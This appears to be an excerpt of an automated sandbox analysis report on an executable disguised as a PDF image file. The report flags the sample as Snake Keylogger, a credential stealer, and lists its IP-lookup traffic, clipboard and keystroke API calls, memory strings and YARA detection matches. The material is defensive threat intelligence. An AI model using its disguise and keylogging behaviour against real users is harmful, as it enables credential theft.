Code function: 0_2_000D4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_000D4EB5

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: RegSvcs.exe, 00000002.00000002.4120751881.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000002.00000002.4120751881.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E2B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BF3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.4120751881.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: silvexes.exe, 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp, silvexes.exe, 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.4120751881.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E52000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B42000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000002.00000002.4120751881.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000002.00000002.4120751881.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: silvexes.exe, 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp, silvexes.exe, 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000005.00000002.4121149937.0000000002BBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: RegSvcs.exe, 00000002.00000002.4120751881.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_000D6B0C

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000D6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_000D6D07
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C06D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		1_2_00C06D07

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

0_2_000D6B0C

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000C2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_000C2B37

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000EF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_000EF7FF
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C1F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		1_2_00C1F7FF

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.silvexes.exe.19a0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.silvexes.exe.19a0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.silvexes.exe.19a0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.silvexes.exe.19a0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 1.2.silvexes.exe.1e60000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.silvexes.exe.1e60000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.silvexes.exe.1e60000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.silvexes.exe.1e60000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2.silvexes.exe.19a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.silvexes.exe.19a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.silvexes.exe.19a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.silvexes.exe.19a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 1.2.silvexes.exe.1e60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.silvexes.exe.1e60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.silvexes.exe.1e60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.silvexes.exe.1e60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: silvexes.exe PID: 7444, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: silvexes.exe PID: 7444, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 7488, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7488, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: silvexes.exe PID: 7676, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: silvexes.exe PID: 7676, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00083D19
Source: IMG-20241119-WA0006(162KB).Pdf.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: IMG-20241119-WA0006(162KB).Pdf.exe, 00000000.00000003.1677287006.0000000003A0D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d138c6f2-7
Source: IMG-20241119-WA0006(162KB).Pdf.exe, 00000000.00000003.1677287006.0000000003A0D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_3eeb972f-3
Source: IMG-20241119-WA0006(162KB).Pdf.exe, 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_32775fcf-0
Source: IMG-20241119-WA0006(162KB).Pdf.exe, 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_9d4455bd-c
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: This is a third-party compiled AutoIt script.	1_2_00BB3D19
Source: silvexes.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: silvexes.exe, 00000001.00000002.1698082110.0000000000C5E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_fcabb9f7-f
Source: silvexes.exe, 00000001.00000002.1698082110.0000000000C5E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_9395b8f2-f
Source: silvexes.exe, 00000004.00000000.1806264290.0000000000C5E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_13610058-e
